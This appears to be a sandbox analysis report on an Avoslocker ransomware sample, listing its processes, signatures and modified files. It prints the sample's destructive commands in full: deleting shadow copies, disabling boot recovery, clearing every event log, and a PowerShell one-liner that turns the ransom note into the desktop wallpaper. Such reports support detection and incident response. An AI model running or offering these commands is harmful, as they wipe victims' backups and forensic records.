PID 1788 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1788 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1788 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1804 wrote to memory of 4736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1804 wrote to memory of 4736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1804 wrote to memory of 4736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1676 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 1948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4492 wrote to memory of 1948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4492 wrote to memory of 1948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4492 wrote to memory of 4200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 4492 wrote to memory of 4200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 4492 wrote to memory of 4200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe

"C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"Z:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2090100087.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

memory/2088-0-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-1-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-5-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-4-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-3-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-2-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-6-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2088-7-0x0000000000400000-0x00000000004E5000-memory.dmp

\Device\HarddiskVolume1\GET_YOUR_FILES_BACK.txt

MD5 b69a0aa7abf916a5f00d0f438cf98fa6
SHA1 1ad8aec6b066487d69492225bb6493b4afd2db64
SHA256 9a3b665f5458ade3c61be4fd2f906a915f8c523127be7456a6bff3677356289d
SHA512 cec0c8f59d7c204f33452223b0f9eaa55bc0ef07f983c42fbdd3ff0906814bf907816bd6b4dd2dbb3292f6396f22b50b0736caf469f1a942fdd7cd09c099cd72

memory/2088-8-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/4276-1258-0x000000001B720000-0x000000001BA02000-memory.dmp

memory/4276-1303-0x00000000003F0000-0x00000000003F8000-memory.dmp

memory/2088-8148-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-14636-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-14635-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-17367-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-18308-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-18376-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-20777-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-20816-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2088-24501-0x0000000000400000-0x00000000004E5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f105965aec4e6b6aa30275c5167567b9
SHA1 d8fe2af6a47b1f576cae7c834a0e4b3f5a5544df
SHA256 8af8a9fc2772d9233f7162e1aef44cc6e7654667500cbc8c24c6e1eebf8c7a77
SHA512 a2c430e6c0513240929143406e7cd3eea05d9ef54f76b43af6112aaad5b2b413ac14e598f393ef89f62e8367f6932894d0fc87f5c9750f7f3fee8eed82103d98

memory/4492-24508-0x000000001B650000-0x000000001B932000-memory.dmp

memory/4492-24509-0x0000000002810000-0x0000000002818000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2090100087.png

MD5 22a90a703f3150597c9be76ffafa5136
SHA1 bff44186563afeccda1406b17401de052c2a3366
SHA256 eab4c9e752548c3a53887993ae66891861a376210ee363e49b4bb29d97d91b7d
SHA512 8bf44a4baa4b19961143e90ddbd02faa1ff321a8742e6ebefd776d7a09d4a8e4aca2b6a6157bba1905f51de54bcfba6ffdfbae71377a6be4bce65332b0b3fa33

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-29 07:08

Reported

2024-05-29 07:10

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (8462) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6581503.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Java\jdk-1.8\include\win32\bridge\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\eu\msipc.dll.mui C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\cursors.properties C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL010.XML C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest4-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Light.scale-100.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\uk\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\shaded.dotx C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-20_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\Common Files\System\ado\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main-selector.css C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Light.scale-125.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Light.scale-150.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\fre\StartMenu_Win10_RTL.mp4 C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1 C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmpnssci.dll.mui C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxMediumTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Common Files\System\ja-JP\wab32res.dll.mui C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Windows Media Player\Icons\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\manifest.xml C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\identity_proxy\identity_helper.Sparse.Canary.msix.DATA C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-16_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-60.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Google.scale-300.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Trial-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\lib\jvm.lib C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols.xml C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteFreeR_Bypass-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tt.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailMediumTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Graph.exe.manifest C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
